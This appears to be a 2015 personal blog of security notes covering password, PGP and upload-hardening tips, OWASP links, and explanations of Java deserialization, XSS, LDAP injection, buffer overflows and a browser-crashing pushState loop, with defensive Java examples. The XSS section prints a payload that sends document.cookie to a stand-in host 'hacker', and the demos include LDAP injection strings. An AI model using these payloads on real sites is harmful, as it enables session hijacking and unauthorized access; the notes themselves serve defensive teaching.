Tuesday, September 15, 2015

Security Miscs



HPE Security Fortify Static Code Analyzer (SCA)
http://www8.hp.com/us/en/software-solutions/static-code-analysis-sast/
https://www.owasp.org/index.php/Source_Code_Analysis_Tools

https://github.com/thoughtbot/guides/tree/master/security
  • Use HSTS headers to enforce HTTPS traffic.
  • Use secure cookies.
  • Avoid protocol-relative URLs.
  • Don't store passwords in plain text.
  • Don't store passwords with a reversible scheme (encryption): anyone who obtains the key can recover every password.
  • Don't hash passwords with a fast general-purpose hash function such as MD5 or SHA-1 (these are hashes, not ciphers, and both are broken or far too fast for passwords); use a deliberately slow, salted password hash such as bcrypt, scrypt or PBKDF2.
  • Don't accept passwords or session tokens over HTTP.
PGP and GnuPG
  • Use a PGP signature in an email if you want somebody to trust that you wrote it.
  • Use PGP to check email signatures if you want to know who wrote it.
  • Use PGP to encrypt emails if you want to be sure nobody but the recipient is reading it.
  • Use ultimate trust for your own keys.
  • Use full trust for keys you have verified in person or via a secure video chat.
  • Don't share your private key with anyone, including services like Keybase.
  • Keep at least one backup of your private key and revocation certificate in a secure location, such as a thumb drive.

  • Use a tool like pwgen or 1password to generate random passwords.
  • Use a tool like GnuPG to encrypt passwords if you need to share them with somebody.
Unrestricted File Upload
  • Never accept a filename and its extension directly without having a white-list filter.
  • Keep a server-side list of permitted extensions and choose the stored extension from that list according to the detected real file type (a "select case" over the content type, in VBScript terms), rather than trusting the extension the client supplied.
  • All the control characters and Unicode ones should be removed from the filenames and their extensions without any exception. Also, the special characters such as “;”, “:”, “>”, “<”, “/” ,”\”, additional “.”, “*”, “%”, “$”, and so on should be discarded as well. If it is applicable and there is no need to have Unicode characters, it is highly recommended to only accept Alpha-Numeric characters and only 1 dot as an input for the file name and the extension; in which the file name and also the extension should not be empty at all (regular expression: [a-zA-Z0-9]{1,200}\.[a-zA-Z0-9]{1,10}).
  • Limit the filename length. For instance, the maximum length of the name of a file plus its extension should be less than 255 characters (without any directory) in an NTFS partition.
  • Generate the stored filename on the server with an algorithm of your own, for instance a random identifier or an MD5 hash of the original name plus the upload date, so that nothing the client sent reaches the file system.
  • Uploaded directory should not have any “execute” permission.
  • Limit the file size to a maximum value in order to prevent denial of service attacks (on file space or other web application’s functions such as the image resizer).
  • Enforce a minimum file size as well: a flood of tiny files can also exhaust storage or per-file processing capacity.
  • Use Cross Site Request Forgery protection methods.
  • Never overwrite an existing file when two uploads produce the same generated name (a hash collision); fail the upload or regenerate the name instead.
  • Use a virus scanner on the server (if it is applicable). Or, if the contents of files are not confidential, a free virus scanner website can be used. In this case, file should be stored with a random name and without any extension on the server first, and after the virus checking (uploading to a free virus scanner website and getting back the result), it can be renamed to its specific name and extension.
  • Accept uploads via POST rather than PUT (and never via GET).
  • Log users’ activities. However, the logging mechanism should be secured against log forgery and code injection itself.
  • If the application extracts compressed files, treat every extracted entry as a new upload and apply all of the checks above to it, including its path, which may contain "../" sequences.
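The filename and size rules above, combined into one added Java example (not code from this page or from OWASP): it applies the quoted regular expression, an assumed allow-list of image extensions, the minimum and maximum size limits, and a random server-generated stored name. The extension list, the size limits and the sample filenames are assumptions for illustration; making the upload directory non-executable is a file-system and web-server setting and is outside this code.

```java
import java.security.SecureRandom;
import java.util.Locale;
import java.util.Set;
import java.util.regex.Pattern;

/** Validates a client-supplied filename and derives a server-controlled stored name. */
public final class UploadNameCheck {
    // Same shape as the regular expression quoted above: letters/digits, exactly one dot.
    private static final Pattern SAFE_NAME = Pattern.compile("[a-zA-Z0-9]{1,200}\\.[a-zA-Z0-9]{1,10}");
    // Assumed allow-list for a hypothetical image upload feature.
    private static final Set<String> ALLOWED_EXT = Set.of("png", "jpg", "jpeg", "gif");
    private static final long MIN_BYTES = 64;                 // assumed minimum
    private static final long MAX_BYTES = 5L * 1024 * 1024;   // assumed maximum
    private static final int MAX_NAME_LEN = 255;              // NTFS limit for name plus extension
    private static final SecureRandom RNG = new SecureRandom();

    /** Returns the permitted lower-case extension, or throws if the name is rejected. */
    public static String checkedExtension(String clientName) {
        if (clientName == null || clientName.length() >= MAX_NAME_LEN) {
            throw new IllegalArgumentException("filename missing or too long");
        }
        // Allow-list the whole name first: this rejects control characters, Unicode,
        // path separators, NUL bytes and any second dot, as in "shell.php.png".
        if (!SAFE_NAME.matcher(clientName).matches()) {
            throw new IllegalArgumentException("filename contains disallowed characters");
        }
        String ext = clientName.substring(clientName.lastIndexOf('.') + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXT.contains(ext)) {
            throw new IllegalArgumentException("extension not permitted: " + ext);
        }
        return ext;
    }

    /** Enforces both the maximum and the minimum size discussed above. */
    public static void checkSize(long declaredBytes) {
        if (declaredBytes < MIN_BYTES || declaredBytes > MAX_BYTES) {
            throw new IllegalArgumentException("size out of range: " + declaredBytes);
        }
    }

    /** Server-chosen name: random, so nothing the client sent reaches the file system. */
    public static String storedName(String ext) {
        byte[] id = new byte[16];
        RNG.nextBytes(id);
        StringBuilder sb = new StringBuilder(32 + 1 + ext.length());
        for (byte b : id) sb.append(String.format("%02x", b));
        return sb.append('.').append(ext).toString();
    }

    public static void main(String[] args) {
        // Constructed sample inputs: two legitimate names, the rest typical bypass attempts.
        String[] names = { "photo.png", "shell.php.png", "../../etc/passwd", "a.png\u0000.php",
                           "script.PHP", "noext", "report.jpg" };
        for (String n : names) {
            try {
                String ext = checkedExtension(n);
                System.out.println(n + " -> accepted, stored as " + storedName(ext));
            } catch (IllegalArgumentException e) {
                System.out.println(n + " -> rejected (" + e.getMessage() + ")");
            }
        }
        checkSize(1024);
    }
}
```

The order matters: the whole-name regular expression runs before the extension is extracted, so a name that smuggles a second extension, a NUL byte or a path separator never reaches the allow-list comparison, and the stored name is built only from the validated extension.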
Top 10 Lists for Designing and Writing Secure and Safe Software
OWASP Top Ten 2013 Project
https://www.owasp.org/index.php/Top_10_2013-Table_of_Contents

https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/
IEEE Top Design Flaws
http://cybersecurity.ieee.org/center-for-secure-design/avoiding-the-top-10-security-flaws.html

https://dzone.com/articles/java-serialization-vulnerability-threatens-million
ObjectInputStream in = new ObjectInputStream(inputStream);
return (Data) in.readObject();
The problem is that there is no way to know what you are deserializing until it has already been decoded. An attacker can serialize a chain of malicious objects and send them to your application; once you call readObject(), it is too late, because the cast to Data happens after the objects have been constructed. In some ways it is like an XXE problem, where an attacker uses a malicious DOCTYPE to trigger attacks during XML parsing. But unlike XXE, where DOCTYPE processing can simply be turned off, a plain ObjectInputStream has no equivalent switch; the fix is to restrict which classes the stream is allowed to resolve (by overriding resolveClass, or on Java 9 and later with an ObjectInputFilter).
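One way to refuse unexpected classes before readObject() constructs them, as an added Java example that is not the article's code: subclass ObjectInputStream and override resolveClass with an allow-list ("look-ahead" deserialization). The Data class, the contents of the allow-list and the sample streams are assumptions for illustration. On Java 9 and later the same policy can be expressed with ObjectInputFilter (JEP 290) instead of subclassing.

```java
import java.io.*;
import java.util.Set;

/** An ObjectInputStream that only resolves classes on an explicit allow-list. */
public final class SafeObjectInputStream extends ObjectInputStream {
    // Assumed allow-list: the one record type this endpoint expects, plus the
    // JDK types its fields may use. Anything else is rejected before instantiation.
    private static final Set<String> ALLOWED = Set.of(
            Data.class.getName(), String.class.getName(), "java.lang.Number", "java.lang.Integer");

    public SafeObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        // resolveClass runs while the class descriptor is read, before readObject()
        // builds the object: the last point at which a gadget class can be refused.
        if (!ALLOWED.contains(desc.getName())) {
            throw new InvalidClassException(desc.getName(), "class not permitted for deserialization");
        }
        return super.resolveClass(desc);
    }

    /** Expected payload type, standing in for the page's Data class. */
    public static final class Data implements Serializable {
        private static final long serialVersionUID = 1L;
        final String name;
        Data(String name) { this.name = name; }
    }

    /** The page's unsafe pattern, kept for contrast. */
    static Object readUnsafe(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            return in.readObject();
        }
    }

    /** Hardened form: the allow-list is enforced before the cast ever runs. */
    static Data readSafe(byte[] bytes) throws IOException, ClassNotFoundException {
        try (SafeObjectInputStream in = new SafeObjectInputStream(new ByteArrayInputStream(bytes))) {
            return (Data) in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] good = serialize(new Data("hello"));
        System.out.println("expected type: " + readSafe(good).name);

        // Constructed stand-in for an attacker's stream: a harmless JDK type that is
        // simply not on the allow-list. A real gadget chain is refused at the same point.
        byte[] unexpected = serialize(new java.util.HashMap<String, String>());
        System.out.println("unsafe reader returns: " + readUnsafe(unexpected).getClass());
        try {
            readSafe(unexpected);
        } catch (InvalidClassException e) {
            System.out.println("safe reader refused: " + e.getMessage());
        }
    }
}
```

The allow-list must cover every class that legitimately appears in the stream, including the types of serialized fields and any superclasses; the first deployment should therefore log refusals rather than silently failing so the list can be completed.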
XSS
http://www.veracode.com/security/xss
For example, the HTML snippet:
<title>Example document: %(title)</title>
is a template in which the variable title is substituted without encoding. With the value XSS Doc it emits the harmless:
<title>Example document: XSS Doc</title>
but a value such as </title><script>alert(1)</script> closes the title element and the injected script runs in the victim's browser. Output must be encoded for the context it is inserted into.
Consider a site whose search field reflects the query without proper output encoding. An attacker crafts a search query such as:
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
The injected script makes the victim's browser request an image from the attacker's server (hacker), and the request path, after the double space, carries the victim's cookie. If an administrator clicks a link containing this query, the attacker receives the administrator's session ID and can hijack the session.
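An added Java example (not from the Veracode page) showing the template above rendered with and without HTML encoding, so the cookie-stealing payload arrives as inert text instead of a script. The encoder and the payload string are constructed for illustration.

```java
/** Context-aware HTML encoding for untrusted values placed in HTML text or attributes. */
public final class HtmlEncode {
    /** Encodes the characters that can break out of an HTML text or quoted-attribute context. */
    public static String forHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                case '/':  sb.append("&#x2F;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** The page's template rendered by plain concatenation (vulnerable) and with encoding. */
    static String renderUnsafe(String title) { return "<title>Example document: " + title + "</title>"; }
    static String renderSafe(String title)   { return "<title>Example document: " + forHtml(title) + "</title>"; }

    public static void main(String[] args) {
        String benign = "XSS Doc";
        // Constructed payload: closes the <title> element and injects a script that leaks
        // the cookie, the same idea as the search-field payload quoted above.
        String hostile = "</title><script>new Image().src='http://hacker/'+document.cookie</script>";
        System.out.println(renderUnsafe(benign));
        System.out.println(renderUnsafe(hostile));  // the script tag reaches the browser intact
        System.out.println(renderSafe(hostile));    // &lt;/title&gt;&lt;script&gt;... is shown as text
    }
}
```

Encoding is context-specific: the table above is right for element content and quoted attributes, but a value placed inside a JavaScript block, a URL or a CSS property needs the encoder for that context, which is why template engines that escape by default and per context are preferred over hand-built concatenation.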

LDAP Injection
http://searchsoftwarequality.techtarget.com/definition/LDAP-injection

https://www.owasp.org/index.php/LDAP_injection
https://www.owasp.org/index.php/Testing_for_LDAP_Injection_(OTG-INPVAL-006)
https://docs.kentico.com/display/K7SG/Lightweight+Directory+Access+Protocol+(LDAP)+injection

http://docs.spring.io/spring-ldap/docs/current/reference/
In addition to simplifying building of complex search parameters, the LdapQueryBuilder and its associated classes also provide proper escaping of any unsafe characters in search filters. This prevents "ldap injection", where a user might use such characters to inject unwanted operations into your LDAP operations.
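An added Java example (not Spring LDAP's code) of what that escaping does: a plain RFC 4515 filter-value escaper applied to a login filter, with a constructed injection attempt beside it. The attribute names and sample input are assumptions for illustration; in a real application the library's query builder does this for you.

```java
/** Building an LDAP search filter from user input, unsafely and with RFC 4515 escaping. */
public final class LdapFilter {
    /** Escapes the filter metacharacters defined by RFC 4515. */
    public static String escapeFilterValue(String value) {
        StringBuilder sb = new StringBuilder(value.length() + 8);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '\\': sb.append("\\5c"); break;
                case '*':  sb.append("\\2a"); break;
                case '(':  sb.append("\\28"); break;
                case ')':  sb.append("\\29"); break;
                case '\0': sb.append("\\00"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Vulnerable: user input is concatenated straight into the filter grammar. */
    static String unsafeFilter(String user, String pass) {
        return "(&(uid=" + user + ")(userPassword=" + pass + "))";
    }

    /** Hardened: every value is escaped, so it can only ever be matched, never parsed. */
    static String safeFilter(String user, String pass) {
        return "(&(uid=" + escapeFilterValue(user) + ")(userPassword=" + escapeFilterValue(pass) + "))";
    }

    public static void main(String[] args) {
        // Constructed injection: closes the uid clause and produces a complete,
        // always-true filter; some servers evaluate only that first filter and
        // ignore the password clause that follows.
        String user = "*)(uid=*))(|(uid=*";
        String pass = "x";
        System.out.println(unsafeFilter(user, pass));
        // (&(uid=*)(uid=*))(|(uid=*)(userPassword=x))
        System.out.println(safeFilter(user, pass));
        // (&(uid=\2a\29\28uid=\2a\29\29\28|\28uid=\2a)(userPassword=x))
    }
}
```

In the escaped form the parentheses and asterisks become literal characters of the uid value, so the filter keeps the shape the developer wrote and the password clause is always evaluated.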
http://segmentfault.com/a/1190000004030596

Buffer Overflow

Example: storing 10 bytes of data in a buffer for which only 8 bytes were allocated.

Principle:

Put simply, a buffer overflow copies an over-long string into a buffer of fixed size, overwriting the adjacent memory; at minimum this makes the program fail.
Because local variables live on the stack, an overflow there can also overwrite the function's saved return address, corrupting the stack so that when the function returns, execution continues at an address the attacker chose; that is how an overflow becomes code execution.
A program in memory is normally divided into three parts: the code (text) segment, the data segment and the stack segment; dynamic data is kept on the stack.
When a function call occurs, the machine does the following:
  • first the arguments are pushed onto the stack;
  • then the contents of the instruction pointer (IP) are saved as the return address (RET);
  • the third item pushed is the base pointer (BP); the current stack pointer (SP) is then copied into BP to serve as the new base address;
  • finally space is reserved for local variables by subtracting an appropriate amount from SP.
The excess bytes of str overwrite the saved BP and RET, and the attacker arranges for the value written over RET to be exactly the entry point of the code they want to execute.
Padding the payload with no-operation (NOP) instructions, a NOP sled, increases the chance that a guessed return address still lands in the payload. Modern compilers and operating systems counter this scheme with stack canaries, non-executable stacks and address space layout randomization, so the textbook attack above assumes those protections are absent.

Github Hacking
http://tech.163.com/16/0122/06/BDTP3FUP000915BD.html
history.pushState() is an API introduced with HTML5: it adds the given URL to the browser history, recording the current history point. The page loops while i < 100000, pushing a new entry each time; after enough repetitions the browser cannot cope with the history size and crashes.
